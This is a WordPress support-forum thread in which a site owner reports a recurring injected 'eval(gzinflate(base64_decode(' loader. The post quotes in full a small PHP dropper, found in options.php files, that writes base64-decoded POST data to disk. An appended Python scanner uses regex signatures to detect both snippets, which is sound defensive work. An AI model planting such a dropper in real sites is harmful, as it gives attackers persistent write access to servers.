• Resolved Gurth

    (@gurth)


    For some while now I’ve been having trouble with
    <?php eval(gzinflate(base64_decode(‘pRn9c9o49ufcz
    being injected into my site — enough that I’ve written a script to go through all the PHP files and remove it, but it keeps getting put back in. Yes, I’ve been hacked, and it doesn’t just affect the WordPress I’m running but also SMF, so it’s not that easy to work out where it’s coming from.

    In trying to find how to stop this, I’m coming across files named options.php in various WordPress directories: the root directory of my WP site, as well as in wp_content/, wp_content/plugins/, wp_content/themes, and wp_content/uploads.

    All of them are 114 bytes in size and contain:

    <?php
    if (isset($_POST['da'])) {
    file_put_contents('options.php', base64_decode($_POST['da']), LOCK_EX);
    }
    ?>

    Since the malicious code is base64-encoded, I strongly suspect these files are related to it, and on downloading a fresh copy of WordPress, I found they also aren’t in the default installation. Before I delete them, though, I want to ask here whether I should indeed do that, or if the files do belong where they are.
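
Added example, not part of the original post or of WordPress: a read-only scanner that walks a site tree and reports PHP files containing either of the two snippets quoted above (the `eval(gzinflate(base64_decode(` loader and the `$_POST`-to-`file_put_contents` dropper). The names `SIGNATURES`, `scan_tree` and `demo` are hypothetical, the sample files are constructed, and the two regexes cover only these patterns, so a clean result does not prove the site is clean.

```python
import os
import re
import tempfile

# Signatures derived from the two snippets quoted in the post above.
SIGNATURES = {
    "eval-gzinflate-base64 loader": re.compile(
        rb"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\("),
    "POST-to-file dropper": re.compile(
        rb"file_put_contents\s*\([^;]*base64_decode\s*\(\s*\$_POST"),
}

def scan_tree(root):
    """Return sorted (relative_path, signature_name) pairs for matching .php files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            for label, pattern in SIGNATURES.items():
                if pattern.search(data):
                    findings.append((os.path.relpath(path, root), label))
    return sorted(findings)

def demo():
    """Scan a constructed sample tree (inert test files, not real site data)."""
    dropper = (b"<?php\nif (isset($_POST['da'])) {\n"
               b"file_put_contents('options.php', base64_decode($_POST['da']), LOCK_EX);\n}\n?>")
    injected = b"<?php eval(gzinflate(base64_decode('AAAA'))); ?>\n<?php echo 'theme'; ?>"
    clean = b"<?php echo base64_decode('aGk='); ?>"  # base64 alone is not flagged
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "wp-content", "themes"))
        for rel, body in [("options.php", dropper),
                          ("wp-content/themes/index.php", injected),
                          ("wp-content/clean.php", clean)]:
            with open(os.path.join(root, *rel.split("/")), "wb") as fh:
                fh.write(body)
        return scan_tree(root)

if __name__ == "__main__":
    for rel, label in demo():
        print(f"{rel}: {label}")
```

Run against a copy or backup of the site with `scan_tree("/path/to/site")`; it only reads files, so it can be compared with a fresh WordPress download before anything is deleted.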

Viewing 4 replies - 1 through 4 (of 4 total)

The topic ‘options.php in various directories’ is closed to new replies.